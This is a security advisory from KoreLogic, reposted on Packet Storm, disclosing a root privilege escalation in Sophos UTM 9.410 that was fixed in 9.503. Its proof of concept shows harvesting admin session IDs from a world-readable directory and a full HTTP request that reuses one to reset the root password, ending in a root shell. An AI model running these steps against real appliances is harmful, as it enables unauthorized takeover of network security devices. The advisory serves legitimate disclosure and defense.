Sophos UTM 9 loginuser Privilege Escalation Via Insecure Directory Permissions

2017-10-25T00:00:00
ID PACKETSTORM:144752
Type packetstorm
Reporter Matthew Bergin
Modified 2017-10-25T00:00:00

Description

                                        
                                            `KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions  
  
Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions  
Advisory ID: KL-001-2017-020  
Publication Date: 2017.10.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: UTM 9  
Affected Version: 9.410  
Platform: Embedded Linux  
CWE Classification: CWE-280: Improper Handling of Insufficient  
Permissions or Privileges  
Impact: Root Access  
Attack vector: SSH  
  
2. Vulnerability Description  
  
The attacker must know the password for the loginuser  
account. The confd client is not available to the loginuser  
account. However, it is possible to list a directory containing  
a sub-directories whose names are valid session identifiers  
(SID) and can be used to make requests on behalf of other  
accounts, such as admin. This allows for escalation to root  
privilege.  
  
3. Technical Description  
  
1. Obtain the a privileged session token  
  
$ ssh loginuser@1.3.3.7  
loginuser@1.3.3.7's password:  
  
Sophos UTM  
(C) Copyright 2000-2016 Sophos Limited and others. All rights reserved.  
Sophos is a registered trademark of Sophos Limited and Sophos Group.  
All other product and company names mentioned are trademarks or registered  
trademarks of their respective owners.  
  
For more copyright information look at /doc/astaro-license.txt  
or http://www.astaro.com/doc/astaro-license.txt  
  
NOTE: If not explicitly approved by Sophos support, any modifications  
done by root will void your support.  
  
loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/  
loginuser@[redacted]:/var/confd/var/sessions > ls -la  
total 40  
drwxr-xr-x 2 root root 4096 Mar 23 14:53 .  
drwxr-xr-x 5 root root 4096 Mar 19 16:06 ..  
-rw-r--r-- 1 root root 359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC  
-rw-r--r-- 1 root root 5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock  
-rw-r--r-- 1 root root 369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk  
-rw-r--r-- 1 root root 35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock  
-rw-r--r-- 1 root root 367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP  
-rw-r--r-- 1 root root 10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock  
-rw-r--r-- 1 root root 370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN  
-rw-r--r-- 1 root root 5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock  
  
2. Set the root password  
  
POST /webadmin.plx HTTP/1.1  
Host: 1.3.3.7:4444  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.5.1.1  
Content-Type: application/json; charset=UTF-8  
Referer: https://1.3.3.7:4444/  
Content-Length: 418  
Cookie: SID=xZzeOIhVClqKYsmCKHrN  
DNT: 1  
Connection: close  
  
{"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": "loginuser",  
"loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko",  
"backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881",  
"current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}  
  
HTTP/1.1 200 OK  
Date: Thu, 23 Mar 2017 14:57:19 GMT  
Server: Apache  
Expires: Thursday, 01-Jan-1970 00:00:01 GMT  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Option: nosniff  
X-XSS-Protection: 1; mode=block  
Vary: Accept-Encoding  
Connection: close  
Content-Type: application/json; charset=utf-8  
Content-Length: 24690  
  
{"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",  
[snip]  
"_cookie":null,"wdebug":0}  
  
3. Look for success message.  
  
"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]  
  
4. Profit.  
  
loginuser@[redacted]:/home/login > su  
Password:  
[redacted]:/home/login # id  
uid=0(root) gid=0(root) groups=0(root),890(xorp)  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has addressed this vulnerability in version  
9.503. Release notes and download instructions can be found at:  
https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic submits vulnerability details to Sophos.  
2017.07.21 - Sophos acknowledges receipt.  
2017.09.01 - 30 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.09.15 - KoreLogic requests an update on the status of this and  
other vulnerabilities reported to Sophos.  
2017.09.18 - Sophos informs KoreLogic that this issue has been  
remediated in release 9.503 for UTM.  
2017.10.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`